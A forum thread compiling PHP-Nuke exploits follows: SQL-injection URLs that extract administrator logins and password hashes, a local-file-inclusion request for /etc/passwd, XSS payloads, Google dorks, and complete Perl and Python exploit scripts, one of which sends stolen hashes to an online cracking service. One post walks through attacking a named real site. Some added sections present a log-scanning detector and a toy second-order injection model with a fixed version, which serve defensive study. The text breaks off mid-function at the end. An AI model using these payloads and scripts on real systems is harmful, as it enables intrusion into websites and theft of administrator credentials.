PHP-Nuke vulnerability overview
Decide, Date: Wednesday, 14.11.2012, 11:28 | Message # 16
Colonel
Group: Administrators
Messages: 241
Reputation: 0
Status: Offline
PHP-Nuke Module eGallery "pid" Remote SQL Injection

PoC:
Code:

modules.php?name=eGallery&file=index&op=showpic&pid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,aid,pwd,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202

PHP-Nuke Module "seminar" Local File Inclusion

PoC:
Code:

modules.php?name=Seminars&op=showSpeech&fileName=../../../../../../../../etc/passwd

Google dork:
Code:

inurl:"modules.php?name=seminar"
 
Decide, Date: Wednesday, 14.11.2012, 11:28 | Message # 17
PHP-Nuke KutubiSitte "kid" SQL Injection

Code
#!/usr/bin/perl  
use Getopt::Std;
use LWP::UserAgent;

sub usg{
printf("

    -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
    |  PHP-NUKE  KutubiSitte [kid]  =>  SQL Injection   |
    -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
   #######################################################
   # Bug by Lovebug Exploit-Code by r080cy90r from RBT-4 #
   #######################################################
<-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->->
#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#
#:-------------------------------------------------------:#
:#|                    USAGE:                           |#:
:#| exploit.pl -h [Hostname] -p [Path] -U [User_Id]     |#:
#:-------------------------------------------------------:#
#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#
#:-------------------------------------------------------:#
:#|                   EXAMPLE:                          |#:
:#|  exploit.pl -h http://site.com -p /php-nuke/ -U 1   |#:
#:-------------------------------------------------------:#
#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#

");
}
sub problem{
     print "\n\n[~] SITO NON VULNERABILE [~]\n\n";
     exit();
}
sub exploitation{
      
     $conn = LWP::UserAgent -> new;
     $conn->agent('Checkbot/0.4 ');
     $query_pwd =
$host.$path."modules.php?name=KutubiSitte&h_op=hadisgoster&kid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0,aid,pwd,4%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D".$user_id."%2F%2A";
     $return_pwd = $conn->get($query_pwd) || problem();
     $return_pwd->content() =~ /([0-9,a-f]{32})/ || problem();
     print "\n \[~\] Admin Password(md5)=$user_id is: $1 \[~\]\n\n ";
    }

getopts(":h:p:U:",\%args);
      $host = $args{h} if (defined $args{h});
      $path = $args{p} if (defined $args{p});
      $user_id= $args{U}if (defined $args{U});
       
      if (!defined $args{h} || !defined $args{p} || !defined $args{U}){
         usg();
      }
      else{
         exploitation();
      }
 
Decide, Date: Wednesday, 14.11.2012, 11:28 | Message # 18
SQL Injection

Exploit:
Code:

modload&name=Hadith&file=index&action=viewcat&cat=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Caid%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A

modload&name=Hadith&file=index&action=viewcat&cat=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Cpwd%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A

 
Decide, Date: Wednesday, 14.11.2012, 11:28 | Message # 19
SQL Injection

Vulnerable: Version 3.0

Exploit:
Code:

http://Target/[path]/modules.php?name=NukeC30&op=ViewCatg&id_catg=-1/**/union/**/select/**/concat(aid,0x3a,pwd),2/**/from/**/nuke_authors/*where%20admin%20-2
 
Decide, Date: Wednesday, 14.11.2012, 11:29 | Message # 20
SQL Injection

Vulnerable: Module ZClassifieds

Exploit:

Code:

modules.php?name=ZClassifieds&cat=-9999999/**/union/**/select/**/pwd,aid/**/from/**/nuke_authors/*where%20admin1/**
 
Decide, Date: Wednesday, 14.11.2012, 11:29 | Message # 21
XSS

Vulnerable: eWeather module

Vulnerable code: in the script /modules/eWeather/index.php
PHP code:
Line 35: $zipCode=$chart;
Line 47: echo "<div align =\"center\"><h2>USA weather for zip code $zipCode</h2>";

The "chart" variable is not filtered.

PoC:
Code:

http://example.net/modules.php?name=eWeather&chart=[XSS]
 
Decide, Date: Wednesday, 14.11.2012, 11:29 | Message # 22
SQL Injection

Vulnerable: PHP-Nuke Platinum 7.6.b.5

Vuln script: dynamic_titles.php

Exploit:
Code:

#!/usr/bin/perl
#Inphex
use LWP::UserAgent;
use LWP::Simple;
use IO::Socket;
use Switch;
#PHP-Nuke Platinum , Forums(Standart) - magic_quotes_gpc = OFF , SQL Injection
#nuke_users Structure:
#user_id name username user_email femail user_website user_avatar user_regdate user_icq user_occ user_from user_interests user_sig user_viewemail user_theme user_aim user_yim user_msnm user_password storynum umode uorder thold noscore bio ublockon ublock theme commentmax counter newsletter user_posts user_attachsig user_rank user_level broadcast popmeson user_active user_session_time user_session_page user_lastvisit user_timezone user_style user_lang user_dateformatuser_new_privmsg user_unread_privmsg user_last_privmsg user_emailtime user_allowhtml user_allowbbcode user_allowsmile user_allowavatar user_allow_pm user_allow_viewonline user_notify user_notify_pm user_popup_pm user_avatar_type user_sig_bbcode_uid user_actkey user_newpasswd last_ip user_color_gc user_color_gi user_quickreply user_allow_arcadepm kick_ban user_wordwrap agreedtos user_view_log user_effects user_privs user_custitle user_specmsg user_items user_trade points user_cash last_seen_blocker user_login_tries user_last_login_try user_gender user_birthday user_next_birthday_greeting
#Description:
#The file includes/dynamic_titles.php is vulnerable to SQL Injection - lines: 44 - 427
#What about PHP-Nukes' SQL Injection Protection?
#I could bypass its SQL Injection protection.
#If the file maintenance/index.php is on the server you can see if magic_quotes_gpc are turned off.
#You can of course edit the SQL Injection , file write is possible.
#
#Note: PHP-Nuke Platinum is very buggy,there are more bugs for sure(e.g. includes/nsbypass.php)
print "usage $0 -h localhost -p / -t nuke_users -c username -id 2\n\n";
$column = "username";
$table = "nuke_users";
$uid = 2;
%cm_n_ = ("-h" => "host","-p" => "path","-c" => "column","-t" => "table","-id" => "uid");

$a = 0;
foreach (@ARGV) {
$a++;
while (($k, $v) = each(%cm_n_)) {
if ($_ eq $k) {
${$v} = $ARGV[$a];
}
}
}
&getit("http://".$host.$path."modules.php?name=Forums&p=-1'union+select-1,".$column."+from+".$table."+where+user_id='".$uid."","<title>(.*?)<\/title>");
sub getit($$)
{
$url = shift;
$reg = shift;

$ua = LWP::UserAgent->new;
$urls = $url;
$response = $ua->get($urls);
$content = $response->content;

if ($content=~m/$reg/) {
($f,$s,$l) = split(">>",$1);
$s =~s/ Post //;
print $column.":".$s."\n";
}
}

© Inphex
 
Decide, Date: Wednesday, 14.11.2012, 11:29 | Message # 23
PHP-Nuke Module EasyContent (page_id) SQL Injection Vulnerability
Code:
-------------------------------------------------------------------------------
php-nuke modules EasyContent remote sql inj
-------------------------------------------------------------------------------
found =xoron
-------------------------------------------------------------------------------
modules.php?op=modload&name=EasyContent&file=index&menu=410&page_id=-1/**/union/**/select/**/0,aid/**/from/**/nuke_authors/**/where/**/radminsuper=1/*
modules.php?op=modload&name=EasyContent&file=index&menu=410&page_id=-1/**/union/**/select/**/0,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*
-------------------------------------------------------------------------------
Example: http://eurowards.org/content/

Note: password and username in title! column number 1

Note 2: Find a decent bug first, then hang around here; when asked, this is how every empty bug gets posted to milw0rm.
If you want to see how a useful bug gets hits:

http://www.milw0rm.com/author/721

just one bug, 16000+ hits, on milw0rm alone ;)

I'm always the king!
----------------------------------------------------------
 
Decide, Date: Wednesday, 14.11.2012, 11:29 | Message # 24
PHP-Nuke Gaestebuch SQL Injection Exploit
Code:
#!/usr/bin/python  
# PHP-Nuke Gaestebuch Module SQL Injection Exploit  
# Coded By Shahin Ramezany For Fun  
# E-Mail : Admin@secuiran.com   
   
import string  
import urllib  
import sys  
import re  
   
def Secuiran():  
         print "\n"  
         print "#####################################################"  
         print "#                WwW.Secuiran.Com                   #"  
         print "# PHP-Nuke Gaestebuch Module SQL Injection Exploit  #"  
         print "#  Coded By Shahin . Ramezany (Vampire) For Fun     #"  
         print "# Keep It Priv8 && Never Post In Public Forum's     #"  
         print "#          E-Mail : Admin@Secuiran.com             #"  
         print "# Gr33tz To : Syst3m_F4ult ,Shinobi ,Samir ,Xtemix  #"  
         print "# Digilas ,Skuk ,Raptor &All Of Secuiran Member's   #"  
         print "#####################################################"  
         print "\n"  
   
   
   
   
#Call Banner  
Secuiran()  
   
print "\n[+] Target Host: e.g: http://127.0.0.1/phpnuke/"  
try:  
         host=raw_input("\nTarget Host (with http) : ")  
except KeyboardInterrupt:  
         print "\n[-] Program Terminated"  
         sys.exit()  
   
print "\n[+] Output File: e.e: secuiran.txt"  
   
try:  
         secuiran=raw_input("\nOutput File: ")  
except KeyboardInterrupt:  
         print "\n[-] Program Terminated"  
         sys.exit()  
   
print "\n[+] Trying  To Connect ...\n"  
   
#SQL Injection URL  
sql_inject=host+"/modules.php?name=gaestebuch_v22&func=edit&id=-1+union+all+select+1,1,1,aid,pwd+from+nuke_authors+where+radminsuper=1"  
   
response = urllib.urlopen(sql_inject).read()  
   
print "[+] Trying  To Inject Code ...\n"  
#Extract Admin User  
   
findall_users=re.compile('<td><input type="text" name="guestemail" size="20" maxlength="50" value="(\w+)"></td>').findall  
found_users=findall_users(response)  
   
#check found user length  
if len(found_users)==0:  
     print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "  
     sys.exit()  
   
#Extract Admin Hash  
response = urllib.urlopen(sql_inject).read()  
findall_hashs=re.compile('<textarea cols="50" rows="20" name="guesttext">(\w+)</textarea>').findall  
found_hashs=findall_hashs(response)  
if len(found_hashs)==0:  
     print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "  
     sys.exit()  
   
   
#Crack The Hash  
md5 = string.join( found_hashs, '' )  
print "[+] Trying To Crack The Hash ..."  
crack="http://tmto.org/server/proxy.php?action=search&div=result&host=MD5_1&arg="+md5  
result = urllib.urlopen(crack).read()  
cracked = re.compile("MD5_1_result,"+md5+" - (\w+)").findall  
if re.match(result,"MD5_1_result,"+md5+" - not found"):  
    print "[-] Can Not Crack"  
    #sys.exit()  
   
found=cracked(result)  
#Convert List To String  
cracked_md5 = string.join( found, '' )  
   
#Print All Info  
Secuiran()  
print "\n[+] Host : ",host  
for i in range(len(found_users)):  
         print "\n[+] Admin User :  ",found_users[i]  
         print "\n[+] Admin Hash :  ",found_hashs[i]  
if (cracked_md5 == "not"):  
         print "\n[-] Sorry Can Not Crack Your Hash Go And Try More !!!"  
else:  
         print "\n[+] Hash Cracked Successfully : ",cracked_md5  
   
#Save All Info In File  
file = open(secuiran, "w")  
file.write("**************************************************WwW.Secuiran.Com**************************************************\n")  
file.write("\n")  
file.write("HOST :")  
file.write("       ")  
file.write(host)  
file.write("\n")  
file.write("\n")  
file.write("USER                        HASH\n")  
file.write("            ")  
file.write("\n")  
for i in range(len(found_users)):  
     file.write(found_users[i])  
     file.write("                         ")  
     file.write(found_hashs[i])  
     file.write("\n")  
file.write("\n")  
if (cracked_md5 == "not"):  
         file.write("\n")  
         file.write("I Can't Crack Your Hash")  
else:  
         file.write("Cracked :")  
         file.write("            ")  
         file.write("\n")  
         file.write(cracked_md5)  
         file.write("\n")  
         file.write("**************************************************WwW.Secuiran.Com**************************************************\n")  
file.close()  
print "\n[+] Successfully, Writed To ",secuiran," File ."
 
Decide, Date: Wednesday, 14.11.2012, 11:30 | Message # 25
PHPNuke <= 8.0 And maybe Higher Blind Sql Injection Vulnerability
Code
#!/usr/bin/python
#===============================================================================#
#                    This is a Priv8 Exploit.                    #
#                    Date: 23/02/2008 [dd,mm,yyyy]                    #
#                    #
#===============================================================================#
#                 PHPNuke <= 8.0 And maybe Higher Blind Sql Injection Vulnerability #2            #
#                    Response Analysis Method                    #
#                    #
#                    Vendor:   http://www.phpnuke.org                          #
#                    Severity:   Highest                    #
#                    Author:   The:Paradox                    #
#===============================================================================#
#              Server configuration requirements:                    #
#                magic_quotes_gpc = 0                    #
#===============================================================================#
#                    Proud To Be Italian.                    #
#===============================================================================#
"""                    
                    Related Codes:
                    mainfile.php; line 89;

if (!ini_get('register_globals')) {
   @import_request_variables("GPC", "");
}
              /Your_Account/index.php; line 1700;
switch($op) {
//   [..]
   case "activate":
   activate($username, $check_num);
   break;
//   [..]   
   }
                    /Your_Account/index.php; line 161:

function activate($username, $check_num) {
   global $db, $user_prefix, $module_name, $language, $prefix;
   $username = filter($username, "nohtml", 1);
   $past = time()-86400;
   $db->sql_query("DELETE FROM ".$user_prefix."_users_temp WHERE time < $past");
   $sql = "SELECT * FROM ".$user_prefix."_users_temp WHERE username='$username' AND check_num='$check_num'";
   echo $sql;   
   $result = $db->sql_query($sql);

"""
#===============================================================================#
# Proof Of Concept / Bug Explanation:                    #
#                    #
# I'm too lazy to write explanation this time. Sql injection Mq=OFF in $check_num variable.       #
# Byte null bypasses all query string check.                    #
#                    #
#===============================================================================#
# Google Dork=> Powered by PHPNuke                    #
#===============================================================================#
# Use this at your own risk. You are responsible for your own deeds.                    #
#===============================================================================#
#                    Python Exploit Starts                    #
#===============================================================================#
import httplib, sys, time
print "\n#=========================================================#"
print "             PHPNuke <= 8.0 And Maybe Higher             "
print "          Blind Sql Injection Vulnerability Mq=0         "
print "                Response Analisys Method                 "
print "                    "
print "                Discovered By The:Paradox                "         
print "                    "
print " Usage:                    "
print " python %s [Target] [Path] [UsernameUnveryfied]          " % (sys.argv[0])
print "                    "   
print " Example:                    "         
print " python %s 127.0.0.1 /Nuke/ Abdullah                     " % (sys.argv[0])
print " python %s www.host.com / Andrea                         " % (sys.argv[0])   
print "                    "   
print "                    "     
print "#=========================================================#\n"
if len(sys.argv)<=3:   sys.exit()
else:   print "[.]Exploit Starting."

target = sys.argv[1]
path = sys.argv[2]

prefix = "nuke_"
port = "80"

j=1
h4sh = ""
md5tuple = []

for k in range(48,58):  md5tuple.append(k) # 48->57 and 97->102
for k in range(97,103): md5tuple.append(k)
md5tuple.append('END')

# Result query >>>
#
# SELECT * FROM nuke_users_temp WHERE username='Nick' AND check_num='1%00' OR (SELECT IF((ASCII(SUBSTRING(pwd,1,1))=99),1,null) FROM nuke_authors WHERE radminsuper=1)='1'   
#

print "[.]Blind Sql Injection Starts.\n\nHash:"
while j <= 32:
   for i in md5tuple:
      if i == 'END':   sys.exit('[-]Exploit Failed.\n')

      conn = httplib.HTTPConnection(target,port)
      conn.request('GET', path + "modules.php?name=Your_Account&op=activate&username=" + sys.argv[3] + "&check_num=1%00'+OR+(SELECT+IF((ASCII(SUBSTRING(pwd," + str(j) + ",1))=" + str(i) + "),1,null)+FROM+" + prefix + "authors+WHERE+radminsuper=1)='1", {}, {"Accept": "text/plain", "lang":"english"})

      response = conn.getresponse()

      time.sleep(0.5)     
      if response.status == 404: sys.exit('[-]Error 404. Not Found.')     
      if response.read().find("New user verification number is invalid.") != -1:
         sys.stdout.write(chr(i))
         sys.stdout.flush()
         h4sh += chr(i)
         j += 1
         break;

print "\n\n[+]All Done.\n-=Paradoxe=-"
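The request shapes collected in the posts so far share a few visible tricks: union/select with MySQL /**/ comments standing in for spaces (often %2F%2A-encoded), a read of the nuke_authors table, the %00 null byte that post #25 relies on, and the ../ run in the Seminars PoC. Once the encoding is normalized they are easy to flag in ordinary web-server access logs. The following scanner is an added example for this thread, not code from any post or from PHP-Nuke: it normalizes each request URI and runs a small indicator set over constructed combined-format log lines (constructed here, modelled on the PoCs above; the IPs and sizes are made up). It generalizes slightly beyond the posts in that the table pattern accepts any prefix, since nuke_ is only PHP-Nuke's default.

```python
"""Flag the request shapes used by the PoCs in this thread in web-server access logs."""
import re
from urllib.parse import unquote_plus

# Combined/common log format: client IP, then the quoted request line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+"')


def normalize(uri):
    """Undo the obfuscations the payloads rely on: URL encoding (decoded until stable, so
    double encoding is handled too), '+' for space, and MySQL /**/ comments used as whitespace."""
    prev, cur = None, uri
    while cur != prev:
        prev, cur = cur, unquote_plus(cur)
    cur = re.sub(r"/\*.*?\*/", " ", cur)   # /**/ between keywords -> a space
    cur = re.sub(r"/\*.*$", " ", cur)      # trailing unterminated /* comment
    return re.sub(r"\s+", " ", cur).lower()


# Each indicator matches one trick visible in the PoCs above. The table prefix is
# generalized: nuke_ is only PHP-Nuke's default.
INDICATORS = {
    "union_select":   re.compile(r"\bunion\b(?: all)? select\b"),
    "authors_table":  re.compile(r"\b[a-z0-9]+_authors\b"),
    "null_byte":      re.compile("\x00"),
    "blind_boolean":  re.compile(r"\bif\s*\(\s*\(?\s*ascii\s*\(\s*substring\b"),
    "path_traversal": re.compile(r"(?:\.\./){3,}"),
}


def classify(uri):
    """Sorted indicator names that fire for one request URI ([] for a clean request)."""
    n = normalize(uri)
    return sorted(name for name, rx in INDICATORS.items() if rx.search(n))


def scan_log(lines):
    """(ip, uri, indicators) for every parseable line that trips at least one indicator."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if m:
            tags = classify(m["uri"])
            if tags:
                hits.append((m["ip"], m["uri"], tags))
    return hits


# Constructed log lines (not from the page), modelled on the PoCs in this thread.
SAMPLE_LOG = [
    # eGallery union/select with %2F%2A%2A%2F-encoded comments (post #16)
    '203.0.113.5 - - [14/Nov/2012:11:28:01 +0400] "GET /modules.php?name=eGallery&file=index'
    '&op=showpic&pid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,aid,pwd,pwd,4/**/from'
    '+nuke_authors/* HTTP/1.1" 200 4311',
    # Seminars traversal (post #16)
    '203.0.113.5 - - [14/Nov/2012:11:28:02 +0400] "GET /modules.php?name=Seminars&op=showSpeech'
    '&fileName=../../../../../../../../etc/passwd HTTP/1.1" 200 1804',
    # blind boolean probe with a null byte in check_num (post #25)
    '198.51.100.7 - - [14/Nov/2012:11:30:00 +0400] "GET /modules.php?name=Your_Account&op=activate'
    "&username=Abdullah&check_num=1%00'+OR+(SELECT+IF((ASCII(SUBSTRING(pwd,1,1))=48),1,null)"
    '+FROM+nuke_authors+WHERE+radminsuper=1)=\'1 HTTP/1.1" 200 9021',
    # ordinary article view
    '192.0.2.10 - - [14/Nov/2012:11:31:00 +0400] "GET /modules.php?name=News&file=article&sid=554'
    ' HTTP/1.1" 200 15230',
]

if __name__ == "__main__":
    for ip, uri, tags in scan_log(SAMPLE_LOG):
        print(ip, ",".join(tags), uri[:60])
```

The decode-until-stable loop matters more than the keyword list: most of the payloads above only look harmless while still percent-encoded, and a rule that matches the raw request line misses every one of them.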
 
Decide, Date: Wednesday, 14.11.2012, 11:30 | Message # 26
I poked around in PHP Nuke 8.0 a while ago. Here's a couple of bugs:

[XSS]
http://nuke/modules.php?name=Encyclopedia&file=search&eid=1%00 "><script>alert()</script>

[XSS]
http://nuke/modules.php?name=Your_Account&op=logout
POST: redirect=1%00"><script>alert()</script>

[SQL-Inj] (POC)
http://nuke/admin.php
POST: aid=d%00'%0DUNION SELECT md5(1),'&pwd=1&random_num=80237&op=login
 
Decide, Date: Wednesday, 14.11.2012, 11:30 | Message # 27
Was poking around PHP Nuke 8.0 and found an SQLi; doesn't look like an old one.

The essence of the bug is that in the News module, in comments, Nuke does not filter the e-mail data when it fetches it from the DB and substitutes it into a query, which lets us inject our SQL code.

Exploit:

As an example I'll take the site sat-port.info
Register, then edit our account:
Code:
http://sat-port.info/modules.php?name=Your_Account&op=edituser

in the "Any Email" field we write:
Code:
admin@admin.ru ',1,2,(select concat_ws(0x3a,aid,pwd) from nuke_authors limit 0,1),4,5,6,7)/*

Take any news item where comments are allowed, for example this one:
Code:
http://sat-port.info/modules.php?name=News&file=article&sid=554

press "Comment" and write a comment with any content; as a result a comment appears containing the administrator's login:hash.
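What this post describes is a second-order injection: the profile editor stores the e-mail correctly, and the comment code later trusts the value because it "came from the database". The model below is an added example for this thread, not PHP-Nuke's code or code from the post. It uses Python's sqlite3 with a constructed three-table schema and a placeholder admin hash; the payload is adapted to that schema (SQLite has no concat_ws(), so || is used, and the column count differs), but the mechanism is the same one the post uses: close the string, supply the remaining values from a subselect, and comment out the rest of the original INSERT with /*. The second function is the same logic with every value bound, including the one read back from the database.

```python
"""Second-order SQL injection: a value that was stored safely is later trusted and
concatenated into a new query. Toy model of the News-comment bug described above."""
import sqlite3

# Constructed sample data, not from the page.
ADMIN_ROW = ("admin", "0123456789abcdef0123456789abcdef")   # placeholder md5-shaped hash

# Attacker-controlled e-mail saved through the (correctly parameterized) profile editor.
# Adapted to this toy schema: SQLite has no concat_ws(), so || is used; the trailing /*
# comments out the rest of the original INSERT, as in the payload quoted above.
EMAIL_PAYLOAD = "evil@example.test', (SELECT aid || ':' || pwd FROM nuke_authors LIMIT 0,1))/*"


def fresh_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE nuke_authors  (aid TEXT, pwd TEXT);
        CREATE TABLE nuke_users    (username TEXT, email TEXT);
        CREATE TABLE nuke_comments (tid INTEGER PRIMARY KEY, sid INTEGER,
                                    name TEXT, email TEXT, comment TEXT);
    """)
    con.execute("INSERT INTO nuke_authors VALUES (?, ?)", ADMIN_ROW)
    return con


def save_profile(con, username, email):
    """First hop: parameterized, so the payload lands in the DB as inert text."""
    con.execute("INSERT INTO nuke_users VALUES (?, ?)", (username, email))


def stored_email(con, username):
    (email,) = con.execute("SELECT email FROM nuke_users WHERE username = ?",
                           (username,)).fetchone()
    return email


def post_comment_vulnerable(con, username, sid, text):
    """Second hop as in the vulnerable module: the e-mail read back from the DB is
    treated as trusted and spliced into the INSERT by string formatting."""
    email = stored_email(con, username)
    sql = ("INSERT INTO nuke_comments (sid, name, email, comment) "
           f"VALUES ({int(sid)}, '{username}', '{email}', '{text}')")
    con.execute(sql)


def post_comment_safe(con, username, sid, text):
    """Same logic, but every value (including the one that came from the DB) is bound."""
    email = stored_email(con, username)
    con.execute("INSERT INTO nuke_comments (sid, name, email, comment) VALUES (?, ?, ?, ?)",
                (sid, username, email, text))


def last_comment(con):
    return con.execute("SELECT email, comment FROM nuke_comments "
                       "ORDER BY tid DESC LIMIT 1").fetchone()


def demo():
    """Run both variants on identical input; {'vulnerable': (email, comment), 'safe': ...}."""
    results = {}
    for label, poster in (("vulnerable", post_comment_vulnerable), ("safe", post_comment_safe)):
        con = fresh_db()
        save_profile(con, "mallory", EMAIL_PAYLOAD)
        poster(con, "mallory", 554, "hello")
        results[label] = last_comment(con)
    return results


if __name__ == "__main__":
    for label, row in demo().items():
        print(f"{label:>10}: email={row[0]!r} comment={row[1]!r}")
```

In the vulnerable run the stored comment body is the admin row, exactly the login:hash the post describes; in the safe run the e-mail column holds the payload as a literal string and the comment is "hello". The lesson is that "escaped on the way in" says nothing about a value's safety on the way out; only binding at the point of use does.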
 
Decide, Date: Wednesday, 14.11.2012, 11:30 | Message # 28
myPHPNuke < 1.8.8_8rc2 (artid) SQL Injection Vulnerability
Code
############################################################

SQL Injection vulnerability in myPHPNuke

By MustLive (http://websecurity.com.ua)

Detailed information: http://websecurity.com.ua/2398/

Description: There is SQL Injection vulnerability in printfeature.php in
myPHPNuke.

SQL Injection:

http://site/printfeature.php?artid=-1%20union%20select%20null,null,aid,pwd,null,null,null,null%20from%20mpn_authors%20limit%200,1

With this query you will receive login and password (hash) of administrator.

Vulnerable versions are myPHPNuke < 1.8.8_8rc2. In last version the
additional filters were added, so it is not vulnerable to this attack. But
version 1.8.8_8rc2 is still vulnerable to SQL Injection and so limited SQL
Injection attack is possible (without using spaces and brackets).

############################################################

# milw0rm.com [2008-09-02]
 
Decide, Date: Wednesday, 14.11.2012, 11:31 | Message # 29
SQL-Injection In PHP-Nuke <= 8.0(Module Reviews)

/modules/Reviews/index.php
Fragment of the vulnerable code:

Code
$uname = filter($cookie[1], "nohtml");  
     $id = intval($id);  
     $score = intval($score);  
     if (is_user($user)) {  
         $krow = $db->sql_fetchrow($db->sql_query("SELECT karma FROM ".$user_prefix."_users WHERE username='$uname'"));  
         if ($krow['karma'] == 2) {  
             $db->sql_query("insert into ".$prefix."_reviews_comments_moderated values (NULL, '$id', '$uname', now(), '$comments', '$score')");  
             include("header.php");  
             title(""._MODERATEDTITLE."");  
             OpenTable();  
             echo "<center>"._COMMENTMODERATED."";  
             echo "<br><br><a href=\"modules.php?name=$module_name&rop=showcontent&id=$id\">"._MODERATEDTITLE."</a>";  
             CloseTable();  
             include("footer.php");  
             die();  
         } elseif ($krow['karma'] == 3) {  
             Header("Location: modules.php?name=$module_name&rop=showcontent&id=$id");  
             die();  
         }  
     }  
     $db->sql_query("insert into ".$prefix."_reviews_comments values (NULL, '$id', '$uname', now(), '$comments', '$score')");
 
Decide, Date: Wednesday, 14.11.2012, 11:31 | Message # 30
There are actually 2 SQL injections here, in the select and in the insert queries; after the cookies are decoded the data is slashed, but in this code fragment the data from $cookie[1] goes into the filter function

Code
function filter($what, $strip="", $save="", $type="") {  
     if ($strip == "nohtml") {  
         $what = check_html($what, $strip);  
//        $what = htmlentities(trim($what), ENT_QUOTES);  
         // If the variable $what doesn't comes from a preview screen should be converted  
         if ($type != "preview" AND $save != 1) {  
             $what = html_entity_decode($what, ENT_QUOTES);  
         }  
     }  
     if ($save == 1) {  
         $what = check_words($what);  
         $what = check_html($what, $strip);  
         if (!get_magic_quotes_gpc()) {  
         $what = addslashes($what);  
}  
     } else {  
         $what = stripslashes(FixQuotes($what,$strip));  
         $what = check_words($what);  
         $what = check_html($what, $strip);  
     }  
     return($what);  
}


and from there into the check_html function

Code
function check_html ($str, $strip="") {  
     /* The core of this code has been lifted from phpslash */  
     /* which is licenced under the GPL. */  
     include("config.php");  
     if ($strip == "nohtml")  
     $AllowableHTML=array('');  
     $str = stripslashes($str);  
     $str = eregi_replace("<[[:space:]]*([^>]*)[[:space:]]*>",'<\\1>', $str);  
     // Delete all spaces from html tags .  
     $str = eregi_replace("<a[^>]*href[[:space:]]*=[[:space:]]*\"?[[:space:]]*([^\" >]*)[[:space:]]*\"?[^>]*>",'<a href="\\1">', $str);  
     // Delete all attribs from Anchor, except an href, double quoted.  
     $str = eregi_replace("<[[:space:]]* img[[:space:]]*([^>]*)[[:space:]]*>", '', $str);  
     // Delete all img tags  
     $str = eregi_replace("<a[^>]*href[[:space:]]*=[[:space:]]*\"?javascript[[:punct:]]*\"?[^>]*>", '', $str);  
     // Delete javascript code from a href tags -- Zhen-Xjell @ http://nukecops.com  
     $tmp = "";  
     while (ereg("<(/?[[:alpha:]]*)[[:space:]]*([^>]*)>",$str,$reg)) {  
         $i = strpos($str,$reg[0]);  
         $l = strlen($reg[0]);  
         if ($reg[1][0] == "/") $tag = strtolower(substr($reg[1],1));  
         else $tag = strtolower($reg[1]);  
         if ($a = $AllowableHTML[$tag])  
         if ($reg[1][0] == "/") $tag = "</$tag>";  
         elseif (($a == 1) || ($reg[2] == "")) $tag = "<$tag>";  
         else {  
             # Place here the double quote fix function.  
             $attrb_list=delQuotes($reg[2]);  
             // A VER  
             //$attrb_list = ereg_replace("&","&",$attrb_list);  
             $tag = "<$tag" . $attrb_list . ">";  
         } # Attribs in tag allowed  
         else $tag = "";  
         $tmp .= substr($str,0,$i) . $tag;  
         $str = substr($str,$i+$l);  
     }  
     $str = $tmp . $str;  
     return $str;  
     exit;  
     /* Squash PHP tags unconditionally */  
     $str = ereg_replace("<\?","",$str);  
     return $str;  
}
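The point of the two functions quoted above is easier to see when the slash handling is traced branch by branch. The model below is an added example, not PHP-Nuke's code and not from the thread: it re-expresses filter() and the slash-relevant part of check_html() in Python. addslashes() and stripslashes() are reimplemented, html.unescape() stands in for html_entity_decode(..., ENT_QUOTES), and check_words() and FixQuotes(), which are not quoted on the page, are identity placeholders; the pre-filter slashing the post mentions is modelled as a plain addslashes(). Two things fall out: the nohtml path the Reviews module uses returns the cookie field with its escaping removed whatever get_magic_quotes_gpc() says, and the html_entity_decode step can even turn an entity into a quote that was never there.

```python
"""Model of the slash handling in the filter()/check_html() code quoted above."""
import html
import re


def addslashes(s):
    """PHP addslashes(): backslash-escape single quote, double quote, backslash and NUL."""
    out = []
    for ch in s:
        if ch in "'\"\\":
            out.append("\\" + ch)
        elif ch == "\0":
            out.append("\\0")
        else:
            out.append(ch)
    return "".join(out)


def stripslashes(s):
    """PHP stripslashes(): remove one level of backslash escaping (\\0 becomes NUL)."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "\\":
            if i + 1 < len(s):
                out.append("\0" if s[i + 1] == "0" else s[i + 1])
            i += 2               # a lone trailing backslash is simply dropped
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def check_html(s, strip=""):
    """Only the two steps that matter here: the unconditional stripslashes() at the top of
    check_html(), then, for strip == "nohtml" (AllowableHTML empty), removal of every tag."""
    s = stripslashes(s)
    if strip == "nohtml":
        s = re.sub(r"<[^>]*>", "", s)
    return s


def check_words(s):   # word filter: not quoted on the page, identity placeholder
    return s


def fix_quotes(s):    # FixQuotes(): not quoted on the page, identity placeholder
    return s


def nuke_filter(what, strip="", save="", type_="", magic_quotes=True):
    """filter() from the post, branch for branch; magic_quotes stands for get_magic_quotes_gpc()."""
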